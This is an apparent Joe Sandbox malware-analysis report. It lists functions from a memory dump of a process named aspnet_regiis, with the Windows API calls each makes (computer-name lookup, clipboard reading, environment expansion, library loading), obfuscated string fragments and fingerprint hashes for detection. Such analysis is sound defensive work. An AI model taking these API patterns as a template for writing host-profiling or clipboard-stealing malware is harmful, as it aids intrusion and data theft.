                                                                              Function 0278A9DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1330 278a9da-278a9f9 1332 278aa00-278aa5c 1330->1332 1332->1332 1333 278aa5e-278aa63 1332->1333 1334 278aa8d-278aa96 1333->1334 1335 278aa65-278aa72 1333->1335 1337 278aa99-278aad1 GetComputerNameExA 1334->1337 1336 278aa80-278aa89 1335->1336 1336->1336 1338 278aa8b 1336->1338 1338->1337
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0278AAAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID: EXCm$_RV]
                                                                              • API String ID: 3545744682-74084992
                                                                              • Opcode ID: 4c861c2ac2fc421d5b6f0da52a47eb53f684c32064f9f3598220585b63ea40fa
                                                                              • Instruction ID: 02c53a81e9d1efe3d6d337b33e6550775c67b9031ea2d0338387185193d48260
                                                                              • Opcode Fuzzy Hash: 4c861c2ac2fc421d5b6f0da52a47eb53f684c32064f9f3598220585b63ea40fa
                                                                              • Instruction Fuzzy Hash: F1212571240B028BE31CCF39C89076AF7D3EFD621072DC66DC4A68B796DA789842CB40
                                                                              Function 0276CD76 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0276CD7A
                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0276CEBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: a0ba0ddfad2f15655209425ccd1956b7b0e72329cdcc84998cc96603ee035672
                                                                              • Instruction ID: 5ae6f9f4dc2b0f2b32b1747238881ffb528a77457e97914791688f7e2e028b00
                                                                              • Opcode Fuzzy Hash: a0ba0ddfad2f15655209425ccd1956b7b0e72329cdcc84998cc96603ee035672
                                                                              • Instruction Fuzzy Hash: 9641C9B4D10B40AFD370EF39D90B7127EB4AB05260F508B1EF9E6866D4E635A4198BD3
                                                                              Function 0276CF3D Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0276CF4F
                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0276CF72
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeSecurity
                                                                              • String ID:
                                                                              • API String ID: 640775948-0
                                                                              • Opcode ID: a457a19743ab44d24c8f99bcd0f714a59fa21c8b3570c0692d52801efab3d664
                                                                              • Instruction ID: 5131e587c75a915420b4003afc98eadaa01f07bacd08ce7e729b7d0cd4c0508b
                                                                              • Opcode Fuzzy Hash: a457a19743ab44d24c8f99bcd0f714a59fa21c8b3570c0692d52801efab3d664
                                                                              • Instruction Fuzzy Hash: CDE042387D9301BAF6B98655EC67F1436165B86F36F308705BB263D2C686F03111851D
                                                                              Function 02769F18 Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,EDECCBF2), ref: 02769FBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: b42830a5863d894cb5c7cd2607e692537a6372af2eaba158b9a27e2a8d28db81
                                                                              • Instruction ID: 90ef82b1d27477edad2f5499f2beea462be1f4d57307e381d72a809275fc2c9d
                                                                              • Opcode Fuzzy Hash: b42830a5863d894cb5c7cd2607e692537a6372af2eaba158b9a27e2a8d28db81
                                                                              • Instruction Fuzzy Hash: 0011237475A3808FD714CE64C9652EB3BA29BD6214F1C896DD2C06B746C77C95038B17
                                                                              Function 0279CEC2 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 0279CFB0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ForegroundWindow
                                                                              • String ID:
                                                                              • API String ID: 2020703349-0
                                                                              • Opcode ID: 7d4c757ea3a464b3a963d4a469f8ebf957d3ac58f28d695d8d5df2e0e2495475
                                                                              • Instruction ID: 14d39a9ab50cc3a571dd58fe6eee6e30883d8b83c0b016550e3fd4498ac8ec21
                                                                              • Opcode Fuzzy Hash: 7d4c757ea3a464b3a963d4a469f8ebf957d3ac58f28d695d8d5df2e0e2495475
                                                                              • Instruction Fuzzy Hash: 1A01D672E402018FDB05CEA9ECD05BB77A2FB8D305B18C47AE652C7346DA388812CB21
                                                                              Function 027966D0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 027966F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultLanguageUser
                                                                              • String ID:
                                                                              • API String ID: 95929093-0
                                                                              • Opcode ID: c324a6c6398744d8b05028bfcef1d510e3f3ecd3332962f2294b3a4ed947ed37
                                                                              • Instruction ID: 4784489254a13aef274d3edac954cdab0ac830baad857a4677740ad3ae1f49be
                                                                              • Opcode Fuzzy Hash: c324a6c6398744d8b05028bfcef1d510e3f3ecd3332962f2294b3a4ed947ed37
                                                                              • Instruction Fuzzy Hash: 7311CE349087828FCF15CF38D5547A9BFB26F5A300F08869CC58AA3391D736A824CB52
                                                                              Function 0279CC10 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0279CC65
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: a658fa7ef1f89cfcf89ed9d70d492461504160e374136d9bc74ffbdcb05bd1a6
                                                                              • Instruction ID: df577cd58cbdf9bb78816976ff4bf7e443c6ad740303202f8a8910428fcb2166
                                                                              • Opcode Fuzzy Hash: a658fa7ef1f89cfcf89ed9d70d492461504160e374136d9bc74ffbdcb05bd1a6
                                                                              • Instruction Fuzzy Hash: CFF0CDB2994211EBC2159F60BC0DE5737B9EFC6B62F015C64E00196100EB30E820CAB2
                                                                              Function 02791726 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: BlanketProxy
                                                                              • String ID:
                                                                              • API String ID: 3890896728-0
                                                                              • Opcode ID: 9497f7020dc7e0d36358b6d697d9b3bca346cfcc3c0b399501716b06a0efd320
                                                                              • Instruction ID: 17be28d47cb7ef10b2110712ef71de41e64578727b72c18c52f7c6decb2d4bd7
                                                                              • Opcode Fuzzy Hash: 9497f7020dc7e0d36358b6d697d9b3bca346cfcc3c0b399501716b06a0efd320
                                                                              • Instruction Fuzzy Hash: A5F0B7B46093418FE394DF29C5A871ABBF5EBC4314F04C91DE48987385DBB99949CF82
                                                                              Function 0278DEF0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: BlanketProxy
                                                                              • String ID:
                                                                              • API String ID: 3890896728-0
                                                                              • Opcode ID: 7816fb8594557e57478275ac648d0ac7c999ccf3dbcd14f6643d85c8697949a1
                                                                              • Instruction ID: fd5f5aa32f5d18c05d6abbb4d1c2c09b9d17bee25695b3250d388c9e8c69fd31
                                                                              • Opcode Fuzzy Hash: 7816fb8594557e57478275ac648d0ac7c999ccf3dbcd14f6643d85c8697949a1
                                                                              • Instruction Fuzzy Hash: 20F0D4705093018FE344DF25C1A871BBBE2BBC8308F11890CE0A54B395C7B6AA4ACF82
                                                                              Function 0279B120 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,02772F77), ref: 0279B140
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: afb5b25ea65e4c81ec4c20c802ea90355596e6219494ff2d1c0e68cd524f50bc
                                                                              • Instruction ID: 14e7fb10470f34be1eb961dc18eebbeab2f81ae91f5d9b5b31f1773fc9ada816
                                                                              • Opcode Fuzzy Hash: afb5b25ea65e4c81ec4c20c802ea90355596e6219494ff2d1c0e68cd524f50bc
                                                                              • Instruction Fuzzy Hash: 81D0C931855532EBCA512E18B819BCB3B55DF49321F074C91A4046A164D634ECA18AD1
                                                                              Function 0279B100 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,8B0C2C00,027688DE,69681CE6), ref: 0279B110
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 76de3b7200a417ea502f9f5f41936a632ce645986d6729fbb5bf47f03cc9652d
                                                                              • Instruction ID: ce814b9ecc637fcd98aeb5f92073d97b84b54317d5af90e57a19cac56ee77afd
                                                                              • Opcode Fuzzy Hash: 76de3b7200a417ea502f9f5f41936a632ce645986d6729fbb5bf47f03cc9652d
                                                                              • Instruction Fuzzy Hash: 88C09231885221EBCA166B14FC08FCB7F69EF49360F028892B008672B1C770BC92CAD4

                                                                              Non-executed Functions

                                                                              Function 02792590 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                              • String ID: ?
                                                                              • API String ID: 2832541153-1684325040
                                                                              • Opcode ID: 2996ed3333a5b181bf58c307a326b4e80819484650204e7bc67f732005de928a
                                                                              • Instruction ID: db31c76b90cc5b77e342b278bb13b527cc73d90760178863943c7662307b41aa
                                                                              • Opcode Fuzzy Hash: 2996ed3333a5b181bf58c307a326b4e80819484650204e7bc67f732005de928a
                                                                              • Instruction Fuzzy Hash: 63417A7140C3819ED302BF78A49836EBFE1AB91214F05496DE8C49B683C7B9859CC793
                                                                              Function 02786C53 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 256COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02786D66
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02786DE4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 9R9P$Q^$U>@<
                                                                              • API String ID: 237503144-3277335807
                                                                              • Opcode ID: e8f924790e02679246918ec70021d42d8f365549f752f20f8565e4db90b97eae
                                                                              • Instruction ID: 81bec8990c2067b87849d7895cb8030e4b95c3c836e30f7230a2c43f62c809e7
                                                                              • Opcode Fuzzy Hash: e8f924790e02679246918ec70021d42d8f365549f752f20f8565e4db90b97eae
                                                                              • Instruction Fuzzy Hash: 89812376A883009FD7289F14D88076FF7E6EBC4724F198A2DEA8A57341D770D855CB82
                                                                              Function 02783400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 027834FB
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 02783598
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: &
                                                                              • API String ID: 237503144-3835491774
                                                                              • Opcode ID: 97e715922e14e8f3226e70922f3ce1c7c9c6912cfc8acfccaadf9c27c41a78b2
                                                                              • Instruction ID: 4a59aad55914c61b819aab0b2f56c9b727de09af6c1aa5d3739915f02f701d20
                                                                              • Opcode Fuzzy Hash: 97e715922e14e8f3226e70922f3ce1c7c9c6912cfc8acfccaadf9c27c41a78b2
                                                                              • Instruction Fuzzy Hash: 475131716493949FE320CF69C88075FBBE6EBC4310F04C92DF9A85B281D7B599098B93
                                                                              Function 02782D70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02782E17
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: eb$zx
                                                                              • API String ID: 237503144-2522594701
                                                                              • Opcode ID: dfa2fd21f49425769aaccfa8bf23f00c3d5d2a8da5bf3e19475c96e40c04ca54
                                                                              • Instruction ID: 0a830d6352acfc36113330e3147d824a6455debf8bdb15bd181469a0ba95b0f6
                                                                              • Opcode Fuzzy Hash: dfa2fd21f49425769aaccfa8bf23f00c3d5d2a8da5bf3e19475c96e40c04ca54
                                                                              • Instruction Fuzzy Hash: 6621367160D3118FD318CF25C89275FBBE2EBC6700F18C83CE5915B296CA75950ACB96
                                                                              Function 02791E96 Relevance: 77.1, APIs: 1, Strings: 43, Instructions: 147memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: AllocString
                                                                              • String ID: ,$0$5$6$9$>$>$@$B$D$F$H$J$L$N$Q$X$\$^$`$`$a$b$b$d$f$f$g$h$j$k$k$l$l$n$p$r$t$v$x$z$|$~
                                                                              • API String ID: 2525500382-2493123460
                                                                              • Opcode ID: 322bfb60814e7cf410d3ef98d1dceddc15a9685968c0012298d6c120d77efdfc
                                                                              • Instruction ID: d0bbf1022792954a88cb333b8322d40e0b27c3bb5f53e3687fbf2730578df08d
                                                                              • Opcode Fuzzy Hash: 322bfb60814e7cf410d3ef98d1dceddc15a9685968c0012298d6c120d77efdfc
                                                                              • Instruction Fuzzy Hash: 0191A22050D7C1CDE332C738885878BBFD26BA3228F084A9DD5E85B2D2C7BA4559C767
                                                                              Function 02791337 Relevance: 47.4, APIs: 2, Strings: 25, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit
                                                                              • String ID: #$$$)$-$0$2$2$2$5$5$=$@$B$H$J$L$N$P$R$T$V$Z$\$]$^
                                                                              • API String ID: 2610073882-2983549690
                                                                              • Opcode ID: b205f4a4d40d4e6e44e10bc4dfc8f9c2ad1e01b58c0f9e087d76705f33dca991
                                                                              • Instruction ID: a0a8bc66703ad382627d827b98765d3cb44d61f786446865351592880bd5809e
                                                                              • Opcode Fuzzy Hash: b205f4a4d40d4e6e44e10bc4dfc8f9c2ad1e01b58c0f9e087d76705f33dca991
                                                                              • Instruction Fuzzy Hash: B841497150C3C08AE366DB28C49838FBFE16BE6308F48595DE4D85B382D7B98509CB97